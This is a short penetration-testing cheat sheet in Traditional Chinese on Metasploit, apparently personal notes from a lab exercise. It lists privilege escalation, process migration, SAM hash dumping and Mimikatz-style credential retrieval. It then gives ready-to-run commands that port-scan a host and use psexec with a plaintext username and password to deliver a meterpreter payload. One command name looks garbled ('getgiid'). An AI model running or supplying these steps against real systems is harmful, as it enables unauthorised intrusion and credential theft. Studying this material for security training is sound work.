【滲透】Metasploit
- 產生payload
- 提權
- getsystem
- 修改進程ID
- ps
- migrate {pid}
- getgiid
- 其他模組
- hashdump: 轉儲 SAM 數據庫的內容
- screenshare: 實時顯示目標機器的桌面
- Kiwi: 供了 Mimikatz 的功能,可以檢索具有足夠權限的系統的憑證
- 掃描網路
- portforwarding
-
-
-
use auxiliary/scanner/portscan/tcp set RHOSTS 172.16.5.200 set PORTS 445,3389 run
-
-
use exploit/windows/smb/psexec
set SMBUser luiza
set SMBPass "BoccieDearAeroMeow1!"
set RHOSTS 172.16.5.200
set payload windows/x64/meterpreter/bind_tcp
set LPORT 8000